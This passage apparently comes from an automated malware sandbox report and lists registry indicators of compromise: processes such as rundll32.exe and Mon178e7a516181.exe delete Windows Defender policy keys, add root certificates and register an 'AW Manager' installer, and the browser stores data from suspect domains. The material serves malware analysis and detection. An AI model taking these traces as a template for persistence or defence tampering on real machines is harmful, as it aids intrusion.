Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}USER rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{A8CDDE19-3402-437B-BB7D-049970CEB656}USER rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft rundll32.exe -
Modifies registry class 64 IoCs
Processes:
rundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{J4ZPT3Z1-W6KY-VVT4-W36K-U3VX5NTXVQUQ} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "893" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myfreshspot.com\ = "1059" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\etoro.com\Total = "580" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\stocks.etoro.com\ = "350" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myfreshspot.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 08dfd237e7c2d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "451" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "518" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1270" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "48" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\stocks.etoro.com\ = "124" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1345" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\etoro.com\Total = "37" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\hio9.xyz MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1762" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\hio9.xyz\NumberOfSubdomain = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\33across.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1f6a83fce8c2d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\etoro.com\Total = "368" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.adsaro.net\ = "28" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myfreshspot.com\Total = "47" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1591" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d32e5a31e7c2d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\hio9.xyz\Total = "207" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\adsaro.net\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.adsaro.net\ = "90" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 3079e009eec2d701 MicrosoftEdge.exe -
Processes:
Mon178e7a516181.exerundll32.exeinstaller.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Mon178e7a516181.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c0000000100000004000000000800000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Mon178e7a516181.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c0000000100000004000000000800000f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 